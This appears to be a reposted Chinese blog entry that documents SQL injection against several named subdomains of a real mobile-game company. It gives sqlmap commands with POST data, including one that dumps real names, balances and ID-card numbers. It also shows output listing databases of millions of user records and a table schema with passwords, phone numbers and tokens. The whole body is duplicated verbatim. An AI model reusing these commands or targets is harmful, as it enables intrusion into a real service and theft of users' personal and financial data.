游戏安全之某手游网SQL注入打包可垮裤查询(涉及百万用户信息)
程序员文章站
2022-04-30 19:30:36
分站POST注入:E:\sqlmap>sqlmap.py -u "http://cms.caohua.com/Member/Register.aspx"...
分站POST注入:E:\sqlmap>sqlmap.py -u "http://cms.caohua.com/Member/Register.aspx" --data "__ha
sh__=QZKMhJ1pv8RhKGxQvSBk9RWXBes%2Bi23q%2FWF3%2BODYAlA%3D&__action__=jvXQDpVsgMF rewgNVdPG1X5DJ2nGcGtHt5dvuyNhp6s%3D&txtLoginPass=88952634&txtLoginPass_2=8895263 4&txtQQ=88952634&txtCheckNum=88952634&txtUserName=88952634" -D MobPlatform -T Da ta_UserAccount -C "RealName,CountMoney,IDCard" --dump
----------------------------------
主站POST注入:E:\sqlmap>sqlmap.py -u "http://www.caohua.com/game.html" --data "content=8895263 4" --current-db
----------------------------
主站POST注入:E:\sqlmap>sqlmap.py -u "http://www.caohua.com/soulb" --data "packcent=88952634" --dbs
-------------------------------
E:\sqlmap>sqlmap.py -u "http://admin.caohua.com/Web/Member/Member.ashx?m=isRepea t&UserName=" --dbs
------------------------------
E:\sqlmap>sqlmap.py -u "http://activity.caohua.com/MarchSKAjax/AjaxIndex.ashx?m= GetQuery&uid=1" --dbs
-----------------------------
E:\sqlmap>sqlmap.py -u "http://wap.caohua.com/Web/Game/GameList/BSearchGame.ashx ?Content=" --dbs
10个裤 都可以查询
数据库:MobPlatform
Database: MobPlatform +----------------------------------+---------+ | Table | Entries | +----------------------------------+---------+ | dbo.Data_ProDownLoad | 6415950 | | dbo.Data_CallBackError | 6067433 | | dbo.Data_ProCPA | 5775310 | | dbo.Data_ProductUsers | 5586541 | | dbo.ExtData_SourcePlanTotalCount | 1663380 | | dbo.Data_UserAccount | 1388708 | | dbo.ExtData_UserPlanTotalCount | 1333119 | | dbo.Data_ProductOrder | 1230833 | | dbo.Data_ProCPS | 1151720 | | dbo.Data_ProductGift | 1107720 | | dbo.ExtData_SourceTotalCount | 1070893 | | dbo.Data_SourcePlanTotalCount | 976886 | | dbo.Data_ProLogin | 840158 | | dbo.Data_UserPlanTotalCount | 654747 | | dbo.ExtData_PlanTotalCount | 587222 | | dbo.ExtData_ProductTotalCount | 485816 | | dbo.Data_PlanTotalCount | 323250 | | dbo.Data_SourceTotalCount | 145167 | | dbo.Data_UserTotalCount | 84706 | | dbo.Base_SourceAPKInfo | 52370 | | dbo.Data_UserPayOrder | 33938 | | dbo.Data_ProductTotalCount | 26426 | | dbo.Base_Server | 18644 | | dbo.Base_UserAdvertPlan | 14106 | | dbo.Data_GiftCheck | 10178 | | dbo.Data_SourceMoneyToMember | 9592 | | dbo.Data_UserBillRecords | 6312 | | dbo.Base_SourceAdvertPlan | 5660 | | dbo.MS_Menu_Role | 3902 | | dbo.Data_UserSecret | 3583 | | dbo.PS_SiteData | 3523 | | dbo.Base_DrawOrders | 3448 | | dbo.Base_UserSource | 2614 | | dbo.Base_UserAccount | 2232 | | dbo.Base_UserInfo | 2214 | | dbo.Base_UserPersonal | 1162 | | dbo.Data_MSDKPayOrders | 1118 | | dbo.Base_UserBankInfo | 1044 | | dbo.Base_ProductGift | 513 | | dbo.Base_SourceHtml | 469 | | dbo.Base_UserCompany | 382 | | dbo.PS_Mixed | 309 | | dbo.Base_AdvertPlan | 227 | | dbo.MSreplication_objects | 219 | | dbo.Data_SourceChargeApply | 175 | | dbo.Base_ProductInfo | 169 | | dbo.MS_Manager_Role | 89 | | dbo.MS_Manager_Role | 89 | | dbo.BBS_Topic | 57 | | dbo.PS_ArticleClass | 53 | | dbo.PS_ArticleClass | 53 | | dbo.MS_Role | 48 | | dbo.Data_UserMoneyInsertPost | 44 | | dbo.PS_AdsClass | 23 | | dbo.PS_AdsClass | 23 | | dbo.MS_Dept | 18 | | dbo.PS_Payment | 16 | | dbo.Base_Corner | 14 | | dbo.Base_ProductArticle | 7 | | dbo.SDK_Class | 5 | | dbo.Base_PackServer | 4 | | dbo.Data_ArticleClass | 2 | | dbo.Data_ProductInfo | 2 | | dbo.CN_Menu | 1 | | dbo.MS_Config | 1 | | dbo.MSreplication_subscriptions | 1 | | dbo.MSsubscription_agents | 1 | +----------------------------------+---------+
数据库:MobUsers_DB
Database: MobUsers_DB +----------------------+---------+ | Table | Entries | +----------------------+---------+ | dbo.Data_UserAccount | 5701357 | +----------------------+---------+
数据库:MobGame_DB
Database: MobGame_DB +---------------------------------+---------+ | Table | Entries | +---------------------------------+---------+ | dbo.Re_OldUser | 4916892 | | dbo.Ur_WalletLog | 2647587 | | dbo.Ur_DoWork | 1610735 | | dbo.SC_GetLog | 1497556 | | dbo.SC_TaskLog | 1497556 | | dbo.Us_Info | 1374572 | | dbo.Ge_GiftCode | 1002609 | | dbo.Ge_GiftCode | 1002609 | | dbo.Data_CallBackError | 632818 | | dbo.AC_Player | 316155 | | dbo.CH_SignLog | 243104 | | dbo.AC_FinshRole | 236807 | | dbo.Or_PayOrder | 182786 | | dbo.Or_GameOrder | 161090 | | dbo.CH_RewardLog | 52355 | | dbo.SG_SignLog | 49922 | | dbo.HP_Integral | 38682 | | dbo.CH_Player | 32054 | | dbo.NY_SignLog | 30008 | | dbo.SI_Info | 27695 | | dbo.HP_ISDonate | 26467 | | dbo.CH_GetLog | 23399 | | dbo.SG_GetLog | 22206 | | dbo.HL_GetLog | 19799 | | dbo.HL_DrawLog | 19014 | | dbo.CH_Order | 15963 | | dbo.NY_Blessing | 13916 | | dbo.SI_Player | 13011 | | dbo.SK_GrabLog | 12175 | | dbo.SI_GiftLog | 10525 | | dbo.NY_Player | 9888 | | dbo.SG_Player | 9452 | | dbo.RP_GetLog | 8559 | | dbo.AC_Receive | 7889 | | dbo.AC_Rotary | 7889 | | dbo.RP_Player | 5868 | | dbo.SK_GetLog | 5501 | | dbo.NY_PayOrder | 4339 | | dbo.SK_Player | 3954 | | dbo.PS_SiteData | 3523 | | dbo.Us_Wallet | 3511 | | dbo.MK_Order | 3246 | | dbo.HL_Player | 2916 | | dbo.Re_Order | 2681 | | dbo.SI_UserRole | 2550 | | dbo.NY_ClockLog | 2089 | | dbo.RP_Order | 1933 | | dbo.MS_Menu_Role | 1915 | | dbo.MK_GetLog | 1854 | | dbo.HL_ExchangeGiftCode | 1804 | | dbo.HL_ExchangeGiftCode | 1804 | | dbo.MK_Player | 988 | | dbo.MSreplication_objects | 303 | | dbo.Ge_Info | 119 | | dbo.SK_Gift | 96 | | dbo.Ur_Work | 92 | | dbo.PM_Order | 71 | | dbo.MS_Manager_Role | 42 | | dbo.MS_Manager_Role | 42 | | dbo.SC_PlayerPlace | 34 | | dbo.SC_PlayerPlace | 34 | | dbo.PS_ArticleClass | 22 | | dbo.PS_ArticleClass | 22 | | dbo.PS_AdsClass | 19 | | dbo.PS_AdsClass | 19 | | dbo.PS_Mixed | 18 | | dbo.AC_Prize | 17 | | dbo.SG_Gift | 15 | | dbo.SK_TimeField | 15 | | dbo.HL_Gift | 13 | | dbo.MS_Role | 12 | | dbo.SC_Scratch | 11 | | dbo.AC_Gift | 10 | | dbo.CH_Gift | 10 | | dbo.MR_Rank | 10 | | dbo.PS_Payment | 10 | | dbo.SI_Gitf | 10 | | dbo.MK_Rebate | 8 | | dbo.RP_Gift | 8 | | dbo.SC_Gift | 8 | | dbo.System_Configs | 8 | | dbo.MS_Dept | 7 | | dbo.NY_Gift | 7 | | dbo.PM_Product | 5 | | dbo.Ms_Config | 4 | | dbo.Re_Info | 4 | | dbo.SK_Seckill | 4 | | dbo.Data_Discount | 3 | | dbo.AC_Role | 2 | | dbo.HL_Turntable | 2 | | dbo.RP_TimeField | 2 | | dbo.SG_Role | 2 | | dbo.CH_Role | 1 | | dbo.HP_Donate | 1 | | dbo.MK_Role | 1 | | dbo.MSreplication_subscriptions | 1 | | dbo.MSsubscription_agents | 1 | | dbo.NY_NewYear | 1 | | dbo.RP_RedPackets | 1 | | dbo.SI_Role | 1 | +---------------------------------+---------+
这个裤还有可以整出论坛的
Database: MobGame_DB Table: Us_Info [19 columns] +----------------+----------+ | Column | Type | +----------------+----------+ | Active | int | | AddDateTime | datetime | | BBSPwd | varchar | | Birthday | datetime | | Email | varchar | | GiveMoney | decimal | | IDCard | varchar | | Install | int | | LoginName | varchar | | NickName | varchar | | Password | varchar | | Pay | decimal | | QQ | varchar | | Rank_ID | int | | RealName | varchar | | Status | char | | Tel | varchar | | Token | varchar | | UpdateDateTime | datetime | +----------------+----------+
跑了几个数据量大的 还有几个就不一一演示了
分站POST注入:E:\sqlmap>sqlmap.py -u "http://cms.caohua.com/Member/Register.aspx" --data "__ha sh__=QZKMhJ1pv8RhKGxQvSBk9RWXBes%2Bi23q%2FWF3%2BODYAlA%3D&__action__=jvXQDpVsgMF rewgNVdPG1X5DJ2nGcGtHt5dvuyNhp6s%3D&txtLoginPass=88952634&txtLoginPass_2=8895263 4&txtQQ=88952634&txtCheckNum=88952634&txtUserName=88952634" -D MobPlatform -T Da ta_UserAccount -C "RealName,CountMoney,IDCard" --dump
----------------------------------
主站POST注入:E:\sqlmap>sqlmap.py -u "http://www.caohua.com/game.html" --data "content=8895263 4" --current-db
----------------------------
主站POST注入:E:\sqlmap>sqlmap.py -u "http://www.caohua.com/soulb" --data "packcent=88952634" --dbs
-------------------------------
E:\sqlmap>sqlmap.py -u "http://admin.caohua.com/Web/Member/Member.ashx?m=isRepea t&UserName=" --dbs
------------------------------
E:\sqlmap>sqlmap.py -u "http://activity.caohua.com/MarchSKAjax/AjaxIndex.ashx?m= GetQuery&uid=1" --dbs
-----------------------------
E:\sqlmap>sqlmap.py -u "http://wap.caohua.com/Web/Game/GameList/BSearchGame.ashx ?Content=" --dbs
10个裤 都可以查询
数据库:MobPlatform
Database: MobPlatform +----------------------------------+---------+ | Table | Entries | +----------------------------------+---------+ | dbo.Data_ProDownLoad | 6415950 | | dbo.Data_CallBackError | 6067433 | | dbo.Data_ProCPA | 5775310 | | dbo.Data_ProductUsers | 5586541 | | dbo.ExtData_SourcePlanTotalCount | 1663380 | | dbo.Data_UserAccount | 1388708 | | dbo.ExtData_UserPlanTotalCount | 1333119 | | dbo.Data_ProductOrder | 1230833 | | dbo.Data_ProCPS | 1151720 | | dbo.Data_ProductGift | 1107720 | | dbo.ExtData_SourceTotalCount | 1070893 | | dbo.Data_SourcePlanTotalCount | 976886 | | dbo.Data_ProLogin | 840158 | | dbo.Data_UserPlanTotalCount | 654747 | | dbo.ExtData_PlanTotalCount | 587222 | | dbo.ExtData_ProductTotalCount | 485816 | | dbo.Data_PlanTotalCount | 323250 | | dbo.Data_SourceTotalCount | 145167 | | dbo.Data_UserTotalCount | 84706 | | dbo.Base_SourceAPKInfo | 52370 | | dbo.Data_UserPayOrder | 33938 | | dbo.Data_ProductTotalCount | 26426 | | dbo.Base_Server | 18644 | | dbo.Base_UserAdvertPlan | 14106 | | dbo.Data_GiftCheck | 10178 | | dbo.Data_SourceMoneyToMember | 9592 | | dbo.Data_UserBillRecords | 6312 | | dbo.Base_SourceAdvertPlan | 5660 | | dbo.MS_Menu_Role | 3902 | | dbo.Data_UserSecret | 3583 | | dbo.PS_SiteData | 3523 | | dbo.Base_DrawOrders | 3448 | | dbo.Base_UserSource | 2614 | | dbo.Base_UserAccount | 2232 | | dbo.Base_UserInfo | 2214 | | dbo.Base_UserPersonal | 1162 | | dbo.Data_MSDKPayOrders | 1118 | | dbo.Base_UserBankInfo | 1044 | | dbo.Base_ProductGift | 513 | | dbo.Base_SourceHtml | 469 | | dbo.Base_UserCompany | 382 | | dbo.PS_Mixed | 309 | | dbo.Base_AdvertPlan | 227 | | dbo.MSreplication_objects | 219 | | dbo.Data_SourceChargeApply | 175 | | dbo.Base_ProductInfo | 169 | | dbo.MS_Manager_Role | 89 | | dbo.MS_Manager_Role | 89 | | dbo.BBS_Topic | 57 | | dbo.PS_ArticleClass | 53 | | dbo.PS_ArticleClass | 53 | | dbo.MS_Role | 48 | | dbo.Data_UserMoneyInsertPost | 44 | | dbo.PS_AdsClass | 23 | | dbo.PS_AdsClass | 23 | | dbo.MS_Dept | 18 | | dbo.PS_Payment | 16 | | dbo.Base_Corner | 14 | | dbo.Base_ProductArticle | 7 | | dbo.SDK_Class | 5 | | dbo.Base_PackServer | 4 | | dbo.Data_ArticleClass | 2 | | dbo.Data_ProductInfo | 2 | | dbo.CN_Menu | 1 | | dbo.MS_Config | 1 | | dbo.MSreplication_subscriptions | 1 | | dbo.MSsubscription_agents | 1 | +----------------------------------+---------+
数据库:MobUsers_DB
Database: MobUsers_DB +----------------------+---------+ | Table | Entries | +----------------------+---------+ | dbo.Data_UserAccount | 5701357 | +----------------------+---------+
数据库:MobGame_DB
Database: MobGame_DB +---------------------------------+---------+ | Table | Entries | +---------------------------------+---------+ | dbo.Re_OldUser | 4916892 | | dbo.Ur_WalletLog | 2647587 | | dbo.Ur_DoWork | 1610735 | | dbo.SC_GetLog | 1497556 | | dbo.SC_TaskLog | 1497556 | | dbo.Us_Info | 1374572 | | dbo.Ge_GiftCode | 1002609 | | dbo.Ge_GiftCode | 1002609 | | dbo.Data_CallBackError | 632818 | | dbo.AC_Player | 316155 | | dbo.CH_SignLog | 243104 | | dbo.AC_FinshRole | 236807 | | dbo.Or_PayOrder | 182786 | | dbo.Or_GameOrder | 161090 | | dbo.CH_RewardLog | 52355 | | dbo.SG_SignLog | 49922 | | dbo.HP_Integral | 38682 | | dbo.CH_Player | 32054 | | dbo.NY_SignLog | 30008 | | dbo.SI_Info | 27695 | | dbo.HP_ISDonate | 26467 | | dbo.CH_GetLog | 23399 | | dbo.SG_GetLog | 22206 | | dbo.HL_GetLog | 19799 | | dbo.HL_DrawLog | 19014 | | dbo.CH_Order | 15963 | | dbo.NY_Blessing | 13916 | | dbo.SI_Player | 13011 | | dbo.SK_GrabLog | 12175 | | dbo.SI_GiftLog | 10525 | | dbo.NY_Player | 9888 | | dbo.SG_Player | 9452 | | dbo.RP_GetLog | 8559 | | dbo.AC_Receive | 7889 | | dbo.AC_Rotary | 7889 | | dbo.RP_Player | 5868 | | dbo.SK_GetLog | 5501 | | dbo.NY_PayOrder | 4339 | | dbo.SK_Player | 3954 | | dbo.PS_SiteData | 3523 | | dbo.Us_Wallet | 3511 | | dbo.MK_Order | 3246 | | dbo.HL_Player | 2916 | | dbo.Re_Order | 2681 | | dbo.SI_UserRole | 2550 | | dbo.NY_ClockLog | 2089 | | dbo.RP_Order | 1933 | | dbo.MS_Menu_Role | 1915 | | dbo.MK_GetLog | 1854 | | dbo.HL_ExchangeGiftCode | 1804 | | dbo.HL_ExchangeGiftCode | 1804 | | dbo.MK_Player | 988 | | dbo.MSreplication_objects | 303 | | dbo.Ge_Info | 119 | | dbo.SK_Gift | 96 | | dbo.Ur_Work | 92 | | dbo.PM_Order | 71 | | dbo.MS_Manager_Role | 42 | | dbo.MS_Manager_Role | 42 | | dbo.SC_PlayerPlace | 34 | | dbo.SC_PlayerPlace | 34 | | dbo.PS_ArticleClass | 22 | | dbo.PS_ArticleClass | 22 | | dbo.PS_AdsClass | 19 | | dbo.PS_AdsClass | 19 | | dbo.PS_Mixed | 18 | | dbo.AC_Prize | 17 | | dbo.SG_Gift | 15 | | dbo.SK_TimeField | 15 | | dbo.HL_Gift | 13 | | dbo.MS_Role | 12 | | dbo.SC_Scratch | 11 | | dbo.AC_Gift | 10 | | dbo.CH_Gift | 10 | | dbo.MR_Rank | 10 | | dbo.PS_Payment | 10 | | dbo.SI_Gitf | 10 | | dbo.MK_Rebate | 8 | | dbo.RP_Gift | 8 | | dbo.SC_Gift | 8 | | dbo.System_Configs | 8 | | dbo.MS_Dept | 7 | | dbo.NY_Gift | 7 | | dbo.PM_Product | 5 | | dbo.Ms_Config | 4 | | dbo.Re_Info | 4 | | dbo.SK_Seckill | 4 | | dbo.Data_Discount | 3 | | dbo.AC_Role | 2 | | dbo.HL_Turntable | 2 | | dbo.RP_TimeField | 2 | | dbo.SG_Role | 2 | | dbo.CH_Role | 1 | | dbo.HP_Donate | 1 | | dbo.MK_Role | 1 | | dbo.MSreplication_subscriptions | 1 | | dbo.MSsubscription_agents | 1 | | dbo.NY_NewYear | 1 | | dbo.RP_RedPackets | 1 | | dbo.SI_Role | 1 | +---------------------------------+---------+
这个裤还有可以整出论坛的
Database: MobGame_DB Table: Us_Info [19 columns] +----------------+----------+ | Column | Type | +----------------+----------+ | Active | int | | AddDateTime | datetime | | BBSPwd | varchar | | Birthday | datetime | | Email | varchar | | GiveMoney | decimal | | IDCard | varchar | | Install | int | | LoginName | varchar | | NickName | varchar | | Password | varchar | | Pay | decimal | | QQ | varchar | | Rank_ID | int | | RealName | varchar | | Status | char | | Tel | varchar | | Token | varchar | | UpdateDateTime | datetime | +----------------+----------+
跑了几个数据量大的 还有几个就不一一演示了